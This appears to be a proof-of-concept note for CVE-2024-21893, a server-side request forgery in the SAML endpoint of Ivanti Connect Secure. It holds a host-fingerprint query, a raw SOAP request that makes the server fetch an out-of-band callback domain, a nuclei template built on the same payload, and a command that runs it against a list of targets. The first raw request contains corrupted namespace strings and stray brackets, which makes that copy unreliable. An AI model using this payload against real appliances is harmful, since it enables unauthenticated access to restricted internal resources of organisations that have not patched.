CVE-2024-21893

参考链接https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US

body="welcome.cgi?p=logo"

POST /dana-ws/saml20.ws HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Connection: closeContent-Length: 792Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">    <soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                         <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                        <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                          <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                   <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

id: CVE-2024-21893

info:  name: Ivanti SAML - Server Side Request Forgery (SSRF)  author: DhiyaneshDk  severity: high  description: |    A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.  reference:    - https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis    - https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two    - https://github.com/advisories/GHSA-5rr9-mqhj-7cr2  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N    cvss-score: 8.2    cve-id: CVE-2024-21893    cwe-id: CWE-918    cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*  metadata:    vendor: ivanti    product: connect_secure    shodan-query: "html:"welcome.cgi?p=logo""  tags: cve,cve2024,kev,ssrf,ivanti

http:  - raw:      - |        POST /dana-ws/saml20.ws HTTP/1.1        Host: {{Hostname}}

        <?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <ds:Signature    xmlns:ds="http://www.w3.org/2000/09/xmldsig#">      <ds:SignedInfo>        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>      </ds:SignedInfo>      <ds:SignatureValue>qwerty</ds:SignatureValue>      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">        <ds:RetrievalMethod URI="http://{{interactsh-url}}"/>        <ds:X509Data/>      </ds:KeyInfo>      <ds:Object></ds:Object>    </ds:Signature>  </soap:Body></soap:Envelope>

    matchers-condition: and    matchers:      - type: word        part: interactsh_protocol  # Confirms the DNS Interaction        words:          - "dns"

      - type: word        part: body        words:          - '/dana-na/'          - 'WriteCSS'        condition: and# digest: 4a0a00473045022100fefc6637185b28b4af8b503bdb7b89401fc591c34cb6082b20322ac0f1ad67c8022027e634cbc733ad699766de6d8eb8f22b6368d0b663cd28cbd957eaaf37f51838:922c64590222798bb761d5b6d8e72950

nuclei.exe -t mypoc/cve/CVE-2024-21893.yaml -l data/CVE-2024-21893.txt